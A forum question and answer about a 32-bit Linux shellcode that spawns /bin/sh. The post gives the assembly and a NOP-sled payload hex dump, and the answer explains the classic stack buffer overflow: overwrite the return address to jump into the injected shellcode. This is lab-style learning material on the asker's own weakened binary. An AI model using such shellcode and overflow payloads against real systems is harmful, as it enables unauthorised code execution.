shellcode spawning a shell

Question

I have my assembly code to spawn a shell

global _start

section .text
_start:

    xor eax, eax
    push eax
    push 0x68732f6e
    push 0x69622f2f
    mov ebx, esp
    push eax
    mov edx, esp
    push ebx
    mov ecx, esp
    mov al, 11
    int 0x80

    xor ebx, ebx
    mov bl, 1
    int 0x80

when I execute it I have a shell so I transformed it in payload

0000000: 9090 9090 9090 9090 9090 9090 9090 9090  ................
0000010: 9090 9090 31c0 5068 6e2f 7368 682f 2f62  ....1.Phn/shh//b
0000020: 6989 e350 89e2 5089 e253 89e1 b00b cd80  i..P..P..S......
0000030: 31db b301 cd80 9090 9090 9090 9090 9090  1...............
0000040: 9090 9090 9090 9090 c8cf ffff 90cf ffff  ................

when I use gdb to see whats happening I get this message:

process 22459 is executing new program: /bin/dash
[Inferior 1 (process 22459) exited normally]

but no shell. If I try my payload on my executable I get a

Illegal instruction (core dumped)

Any help on whats going on?

I compiled my executable with --fno-stack-protector, ASLR turned off and stack executable.

Answer 1

How do you transfer the control flow to your shellcode when you try it on the victim executable?

Supposing you feed the shellcode as a parameter, then you must also calculate the following:

1. Find out the offset of the return address's location, calculated from the start of the overflown buffer.

2. Find the address of your unchecked buffer - local variable. Suppose you have the following:

void vulnerable_function(char *buf) { char critical_buf[50]; <-- this will be overflown ... strcpy(critical_buf,buf); ... } Since your payload will get on the stack once it's copied in critical_buf local variable, you must know the memory address of this local variable. For the above case, the stack will look like this:

Stack layout:   <<< Growth direction
LOW_ADDR -------------------------------------------------------------------------- HIGH_ADDR
... | critical_buf .......................... | frame_pointer | ret_addr | *buf (param1) | ... 
    <---------------- 50 --------------------->               < offset from critical_buf?>

So, your payload will consist of the shellcode, plus enough bytes so that ret_addr is replaced by the address of the start of critical_buf local variable from the stack. This is the "ABC" stack overflow attack model.

In this situation, the payload will consist of the following: actual shellcode + N bytes + address of critical_buf on the stack so that instead of returning to the normal flow, the instruction pointer will be pointed to your shellcode, which only then will execute.

You can fill surplus bytes with NOPs and place the shellcode closer to the return address. Then, you can point to a greater range of addresses for the replaced ret address.

Use GDB on the victim to find out the relevant addresses and calculate the deltas from there.